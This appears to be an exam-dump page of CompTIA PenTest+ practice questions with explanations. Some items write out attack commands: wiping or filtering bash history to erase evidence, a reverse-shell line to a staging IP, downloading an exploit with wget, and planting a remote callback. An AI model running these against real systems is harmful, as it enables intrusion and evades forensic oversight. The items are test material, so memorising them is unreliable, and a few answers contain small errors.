Practice Exams:

CompTIA PT0-002 Exam Dumps & Practice Test Questions

Question 1:

During a security evaluation, a penetration tester successfully accesses a Linux system. After conducting various reconnaissance and post-exploitation activities, the tester executes commands aimed at altering or erasing the Bash command history associated with the compromised session.

What is the main reason behind modifying or clearing the Bash history file in such a scenario?

A. Redirecting the Bash history output to /dev/null
B. Creating a backup copy of the user’s .bash_history file for analysis
C. Erasing evidence by removing entries from the Bash history
D. Generating misleading files to distract investigators

Correct Answer: C

Explanation:

When penetration testers or attackers gain control over a system, one of their priorities during the post-exploitation phase is to avoid detection by system administrators or forensic investigators. A common way attackers attempt to cover their tracks is by manipulating the Bash shell’s history file, which records all commands executed by the user. On most Linux systems, this file is stored at ~/.bash_history.

By clearing or altering this file, attackers can effectively erase evidence of their activity, making it more difficult to reconstruct the sequence of malicious actions or commands that were executed. Several commands are often used to accomplish this:

  • history -c clears the shell’s in-memory command history immediately.

  • Redirecting /dev/null into ~/.bash_history (cat /dev/null > ~/.bash_history) erases the file’s contents.

  • Unsetting the HISTFILE environment variable (unset HISTFILE) stops the shell from writing future commands to the history file.

Together, these actions help hide traces of unauthorized access and make forensic analysis more challenging. This technique is widely known and monitored by security teams who often set up logging mechanisms or alerting systems to detect suspicious modifications to shell history files.

Why the other options are less relevant:

  • A is only partially correct; redirecting history to /dev/null is not a standard or reliable method to clear history.

  • B describes gathering intelligence by copying the history, which is the opposite of hiding activity.

  • D mentions deception through decoy files, which can be a tactic, but unrelated to Bash history manipulation.

In summary, clearing the Bash history is a classic evasion tactic used by attackers to cover their tracks and avoid forensic detection.

Question 2:

A penetration test that targets compliance objectives is conducted to verify whether a system or network adheres to specific industry regulations and legal requirements. Unlike general security assessments, this type of test focuses on validating that mandated controls and protections are properly implemented and functioning as intended.

What is the primary objective of a compliance-focused penetration test?

A. Extracting Personally Identifiable Information (PII) from protected systems
B. Circumventing security controls on perimeter devices
C. Assessing how effectively a set of prescribed security standards is enforced
D. Retrieving specific confidential data from the network

Correct Answer: C

Explanation:

Compliance-based penetration testing is distinct from broader security testing because its main goal is to evaluate adherence to regulatory frameworks and security standards such as GDPR, HIPAA, PCI-DSS, or SOX. Organizations are required to comply with these standards to protect sensitive information and maintain legal and industry certifications.

The test focuses on verifying that the specific security controls, policies, and processes mandated by these regulations are present and effective. This includes checking for encryption, access controls, logging, and vulnerability management measures that the compliance regime demands. The penetration tester’s role is to simulate attacks to confirm whether the controls stand up to real-world threats in a way that satisfies auditors and regulators.

Why the other options are incorrect:

  • A (Extracting PII) is not the main purpose of compliance testing, although protecting such data is an underlying concern. The test verifies that protections are in place, rather than focusing on the actual data extraction.

  • B (Bypassing perimeter protections) is part of many penetration tests but not the specific focus of compliance testing, which is more standards-driven.

  • D (Retrieving data) is a general pen test objective but not uniquely tied to compliance assessments.

Ultimately, the main concern of compliance-based penetration testing is determining whether an organization’s security posture complies with established regulations and if the controls are functioning as intended to reduce risk and protect sensitive data. This ensures both regulatory compliance and better overall security hygiene.

Question 3:

The MITRE ATT&CK framework offers a comprehensive, organized method for understanding how cyber attackers carry out their operations within IT systems. It helps security teams identify the adversaries’ tactics, techniques, and procedures (TTPs), enabling more effective anticipation and defense against attacks.

When describing the benefits of the MITRE ATT&CK framework to a company’s chief legal officer, which of the following points would be the most important to emphasize?

A. Gaining insight into attack tactics aids in disrupting those attacks.
B. Prebuilt scripts from the framework can be directly integrated into SIEM systems.
C. The framework helps in more accurately calculating incident costs.
D. The framework is unchanging, ensuring a stable security program over time.

Correct Answer: A

Explanation:

The MITRE ATT&CK framework is a widely adopted, open-source knowledge base that catalogs the behaviors and methods adversaries use during cyber intrusions. It organizes these actions into detailed tactics and techniques, providing defenders with a structured way to understand how attacks unfold across different stages.

When communicating the value of this framework to a chief legal counsel—who may not be deeply technical—it’s crucial to focus on how ATT&CK helps the organization anticipate and disrupt attacks. By understanding the specific tactics attackers use, security teams can design detection and mitigation strategies that intercept intrusions earlier, potentially preventing data breaches or reducing their impact. This proactive threat intelligence is the most relevant and compelling benefit for legal counsel because it directly supports risk reduction and regulatory compliance efforts.

Looking at the other options:

  • B is technical and relates to how security tools might implement ATT&CK-based detections, but this detail is less meaningful to legal personnel.

  • C is incorrect because while ATT&CK can improve understanding of an attack, it is not designed to calculate financial damages—this is better suited to risk management or financial modeling.

  • D is inaccurate since ATT&CK is regularly updated to reflect new attack techniques, making it a dynamic and evolving resource, not static.

In summary, the key advantage of the MITRE ATT&CK framework is that it helps organizations identify and disrupt attacker behavior early by providing a clear, actionable map of adversary tactics. This benefit is vital for improving defenses and managing cybersecurity risk effectively, making it the most appropriate point to highlight to legal counsel.

Question 4:

The OWASP Top 10 is a renowned publication from the Open Web Application Security Project that lists the leading security vulnerabilities affecting web applications. This list assists organizations in recognizing common threats and focusing remediation efforts.

Which two statements best describe the OWASP Top 10? (Choose two.)

A. It identifies the most critical risks to web applications.
B. It lists every possible risk faced by web applications.
C. It presents risks in an order reflecting their importance.
D. It serves as an official web application security standard.
E. It functions as a framework for risk governance and compliance.
F. It is a checklist of vulnerabilities specific to Apache servers.

Correct Answers: A and C

Explanation:

The OWASP Top 10 is a globally recognized and influential list designed to highlight the most significant security risks to web applications. Published and regularly updated by the Open Web Application Security Project, it serves as a foundational awareness document for developers, security professionals, and organizations working to improve application security.

Option A is correct because the OWASP Top 10 focuses on the most critical and common vulnerabilities—such as SQL injection, cross-site scripting (XSS), and broken access controls—that pose the greatest risk to web apps worldwide. These risks are selected based on data about their prevalence and impact, making the list a prioritized guide rather than a comprehensive catalog.

Option C is also correct because the OWASP Top 10 tends to rank these vulnerabilities by their relative importance or risk level, considering factors such as exploitability and damage potential. Although it’s not an exact severity ranking, the list helps organizations understand which issues require urgent attention.

The incorrect options:

  • B is wrong because the OWASP Top 10 does not cover all vulnerabilities—it highlights only the most critical.

  • D is incorrect since the OWASP Top 10 is not a formal security standard like PCI DSS or ISO 27001, but rather a guideline for awareness and education.

  • E is false because OWASP Top 10 does not provide a governance or compliance framework but may assist compliance efforts.

  • F is wrong as the list applies broadly to web applications regardless of the underlying web server or platform and is not specific to Apache.

In conclusion, the OWASP Top 10 is a prioritized list of the most significant web application security risks, helping organizations focus their resources on the vulnerabilities that matter most.

Question 5:

A penetration tester discovers a directory traversal vulnerability that allows unauthorized file uploads to certain server paths. Sensitive files such as configuration scripts are accessible through this flaw. 

Which approach would best enable an attacker to exploit this vulnerability and gain internal access to the compromised system?

A. Modify one of the accessible files by adding a line of code that initiates a remote callback.
B. Download Perl (.pl) files and search for embedded usernames and passwords.
C. Alter the smb.conf configuration file and upload it back to the server.
D. Download the smb.conf file and review its configuration settings.

Correct Answer: A

Explanation:

In this scenario, the penetration tester has found a directory traversal vulnerability combined with unauthorized file upload capabilities. This combination allows an attacker to potentially place or modify files on the target server. The most direct and effective way to exploit this is by injecting code into an accessible file that enables the attacker to gain a foothold inside the system.

Option A is the best choice because modifying a file (for example, a script like a .php or .pl file) by inserting a single line of code that creates a reverse shell or remote callback allows the attacker to connect back to their own machine. This remote connection bypasses firewall restrictions and initiates communication from inside the victim network, providing the attacker with internal access and control.

Other options are less effective or indirect:

  • Option B involves downloading Perl scripts to manually extract credentials. While this may eventually help, it requires further steps and does not immediately provide system access.

  • Option C assumes the attacker can modify and upload the smb.conf file, which is a configuration file for Samba (Windows file-sharing). However, this requires the server to be running Samba and the attacker to have upload privileges that affect that specific service, which is less likely and slower to exploit.

  • Option D is purely passive—just reviewing a configuration file does not grant access. Without modification or additional exploits, this is not a path to immediate internal access.

Therefore, the most efficient exploitation method is to alter an accessible script with a remote callback, allowing attackers to control the server remotely and bypass network restrictions. This approach leverages the vulnerability for immediate internal system compromise.

Question 6:

A company has received authorization from its cloud provider to perform a vulnerability scan on its cloud-hosted data infrastructure. 

To effectively assess security risks, what should the penetration tester verify first to evaluate the risk to sensitive hosted data?

A. Whether sensitive client data is publicly accessible.
B. Whether the communication between the cloud and the client is secure.
C. Whether the client’s employees are adequately trained to use the platform.
D. Whether the cloud applications were developed following a secure Software Development Lifecycle (SDLC).

Correct Answer: A

Explanation:

When assessing security in cloud environments, the foremost priority is to ensure that sensitive data is not exposed to the public or unauthorized users. This is a foundational step in protecting data confidentiality and preventing breaches.

Option A is correct because it directly addresses the risk of inadvertent data exposure, which is a common and critical vulnerability in cloud setups. Publicly accessible data—such as misconfigured Amazon S3 buckets or open database endpoints—can lead to immediate and serious data breaches. Therefore, verifying whether sensitive client data is accessible without proper permissions should always be the initial focus of any cloud security assessment.

While other options are important components of a comprehensive security posture, they are secondary in the order of risk management:

  • Option B relates to securing data in transit (e.g., using TLS encryption). This is crucial but assumes the data is already protected from exposure. If data is publicly accessible, encryption alone cannot prevent leaks.

  • Option C concerns employee training. Although essential for operational security, this is a procedural measure and not the first step in vulnerability scanning or technical risk assessment.

  • Option D involves verifying secure development practices through SDLC. While this helps prevent software vulnerabilities, it is more relevant after confirming data exposure risks are managed.

In summary, identifying whether sensitive client data is publicly exposed is the highest priority for vulnerability scanning in cloud environments. It provides the most direct insight into potential data breaches and guides remediation efforts effectively before moving on to securing communication channels, personnel training, or development practices.

Question 7:

During a penetration test, an attacker started a simple HTTP server on a staging machine using Python, which serves files from the current directory on port 9891. The tester now wants to download a file called "exploit" from this server onto a target machine and run it.

Which command should the tester use on the target machine to download the "exploit" file from the HTTP server?

A. nc 10.10.51.50 9891 < exploit
B. powershell -exec bypass -f \10.10.51.50\9891
C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
D. wget 10.10.51.50:9891/exploit

Correct answer: D

Explanation:

In penetration testing, starting a simple HTTP server with Python (e.g., python -m http.server 9891) allows serving files over HTTP from the current directory. Here, the tester wants to download a file named exploit hosted on this server to the target machine for execution.

Let’s analyze each option:

  • Option A: nc 10.10.51.50 9891 < exploit
    Netcat (nc) is a versatile networking tool, often used to transfer data or establish reverse shells. However, this command sends the local file exploit from the target to the server, the opposite of downloading. So it won’t download the file from the server.

  • Option B: powershell -exec bypass -f \\10.10.51.50\9891
    This PowerShell command tries to execute a file from a network share, but the path \\10.10.51.50\9891 is a UNC path (Windows share), not an HTTP URL. Also, this command does not download files over HTTP, so it will fail.

  • Option C: bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
    This looks like a malformed attempt to open a reverse shell by connecting to a TCP port, but the syntax is incorrect. It doesn’t instruct Bash to download the file. Hence, it’s invalid.

  • Option D: wget 10.10.51.50:9891/exploit
    wget is a command-line tool used to download files over HTTP, HTTPS, or FTP. This command correctly specifies the server IP and port, and the file path. It will download the file exploit from the HTTP server to the target machine.

In summary, Option D is the simplest and most appropriate command for downloading a file from a Python HTTP server during a penetration test.

Question 8:

After successfully exploiting a target system, a penetration tester wants to clean up the system to erase evidence of their activities, especially commands related to the exploit named "apache."

Which of the following commands is best suited to remove traces of “apache” commands from the user’s shell history?

A. grep -v apache ~/bash_history > ~/.bash_history
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM apache /F

Correct answer: A

Explanation:

Post-exploitation cleanup is a critical step for penetration testers to avoid detection. One common way to cover tracks is by editing or clearing the shell command history, so commands used during exploitation do not remain visible to system administrators.

Let’s examine each option:

  • Option A: grep -v apache ~/bash_history > ~/.bash_history
    This command filters out any lines containing the string "apache" from the user's bash history. It uses grep -v (which means “exclude”) to remove all such entries and then writes the filtered output back to the .bash_history file. This directly removes traces of commands related to the "apache" exploit from the command history, making it an effective way to cover tracks.

  • Option B: rm -rf /tmp/apache
    This deletes a directory or file named apache in /tmp. Although deleting exploit files or temporary directories can be useful, it doesn’t erase command history or logs, so it’s less effective for covering tracks.

  • Option C: chmod 600 /tmp/apache
    This changes file permissions to make /tmp/apache readable and writable only by the owner. While it limits access, it doesn’t delete evidence or history and is not typically part of post-exploitation cleanup.

  • Option D: taskkill /IM apache /F
    This Windows command forcibly terminates the Apache process. While useful for stopping services, it does not remove any traces of the attacker’s commands or presence on the system.

Therefore, Option A is the best choice because cleaning the shell history is a direct and effective method to erase traces of exploitation activities.

Question 9:

Following a static application security testing (SAST) process, a penetration tester must prepare a report for application developers. The report should clearly highlight vulnerabilities so developers can effectively remediate them. 

What is the most critical element to include in this report aimed at developers?

A. A high-level summary of the penetration-testing techniques used
B. A detailed bill of materials including supplies, subcontractor details, and costs related to the assessment
C. Quantitative evaluations of the potential impact if the software were compromised
D. Specific code excerpts showing unsafe typecasting vulnerabilities with relevant context

Correct Answer: D

Explanation:

When performing a Static Application Security Test (SAST), the main objective is to identify security weaknesses within the application’s source code before deployment. The final report produced from this analysis is primarily meant for the development team because they are responsible for correcting the security flaws. Consequently, the report should emphasize clear, actionable, and technical details that enable developers to understand and fix vulnerabilities efficiently.

Looking at each option:

  • A: An executive summary detailing penetration-testing methods is often useful for high-level stakeholders or managers but offers limited value to developers. Developers require precise, technical insights rather than a general overview of how the tests were conducted.

  • B: Including a bill of materials with costs and subcontractor information is irrelevant to security remediation and is more appropriate for financial or procurement departments rather than a developer-focused security report.

  • C: While understanding the potential impact of vulnerabilities can help prioritize fixes, developers need specific information about the vulnerabilities themselves, not just business risk assessments. Without concrete technical context, developers cannot effectively remediate issues.

  • D: Providing the code context, especially highlighting problematic areas such as unsafe typecasting, is critical. Unsafe typecasting can introduce severe risks like buffer overflows, memory corruption, or unexpected behavior, which are often difficult to identify without seeing the exact code snippets. This contextual information allows developers to grasp the nature of the issue quickly and implement targeted fixes.

In summary, the most valuable part of a SAST report for developers is detailed code-level context that pinpoints vulnerabilities like unsafe typecasting. This enables developers to understand and address the issues effectively, ensuring the security of the software.

Question 10:

A penetration tester is conducting a network vulnerability assessment and discovers several outdated services running on target machines. 

Which of the following is the best next step to further identify exploitable weaknesses related to these services?

A. Execute credentialed scans to gather more detailed information
B. Run passive reconnaissance to avoid detection
C. Perform exploitation of known vulnerabilities immediately
D. Document the findings and report to the client

Correct Answer: A

Explanation:

In the context of penetration testing, once outdated services are identified during a network vulnerability assessment, the next logical step is to conduct credentialed scans. Credentialed scans involve using authorized access credentials to log into the target systems and perform a deeper inspection of the services and configurations.

Why is this important? Credentialed scans provide more detailed and accurate information about the system’s vulnerabilities because they allow access to internal configurations, patch levels, and system settings that non-credentialed scans cannot see. This helps to identify exploitable weaknesses that may not be apparent from an external perspective.

Choosing to run passive reconnaissance (option B) limits detection risk but provides minimal information, which is less effective once outdated services have been found. Passive reconnaissance is typically a first step to gather information without alerting the target but is insufficient for deep vulnerability analysis.

Performing exploitation immediately (option C) is risky without a full understanding of the target system. Exploiting vulnerabilities without a thorough analysis can cause unintended damage or service interruptions, and also violates the rules of engagement if not properly authorized.

Documenting and reporting (option D) is an important part of the testing process but should come after the tester has gathered sufficient evidence and verified vulnerabilities through further investigation.

In summary, after identifying outdated services, executing credentialed scans is the best way to deepen the assessment, validate vulnerabilities, and prepare for safe, effective exploitation within the rules of engagement. This method ensures that the penetration tester collects comprehensive data necessary to produce an actionable and accurate report for remediation.


How to open VCE Files

Use VCE Exam Simulator to open VCE files

Avanset VCE Simulator
Sign Up Learn More Full Version

Top CompTIA Certifications

CASP Exams CompTIA A+ Exams CompTIA Cloud+ Exams CompTIA CySA+ Exams CompTIA IT Fundamentals Exams CompTIA Linux+ Exams CompTIA Network+ Exams CompTIA PenTest+ Exams CompTIA Project+ Exams CompTIA Security+ Exams CompTIA SecurityX Exams

Top CompTIA Certification Exams

Site Search:

 

VISA, MasterCard, AmericanExpress, UnionPay

SPECIAL OFFER: GET 10% OFF

ExamCollection Premium

ExamCollection Premium Files

Pass your Exam with ExamCollection's PREMIUM files!

  • ExamCollection Certified Safe Files
  • Guaranteed to have ACTUAL Exam Questions
  • Up-to-Date Exam Study Material - Verified by Experts
  • Instant Downloads
Enter Your Email Address to Receive Your 10% Off Discount Code
A Confirmation Link will be sent to this email address to verify your login
We value your privacy. We will not rent or sell your email address

SPECIAL OFFER: GET 10% OFF

Use Discount Code:

MIN10OFF

A confirmation link was sent to your e-mail.
Please check your mailbox for a message from support@examcollection.com and follow the directions.

Next

Download Free Demo of VCE Exam Simulator

Experience Avanset VCE Exam Simulator for yourself.

Simply submit your e-mail address below to get started with our interactive software demo of your free trial.

Free Demo Limits: In the demo version you will be able to access only first 5 questions from exam.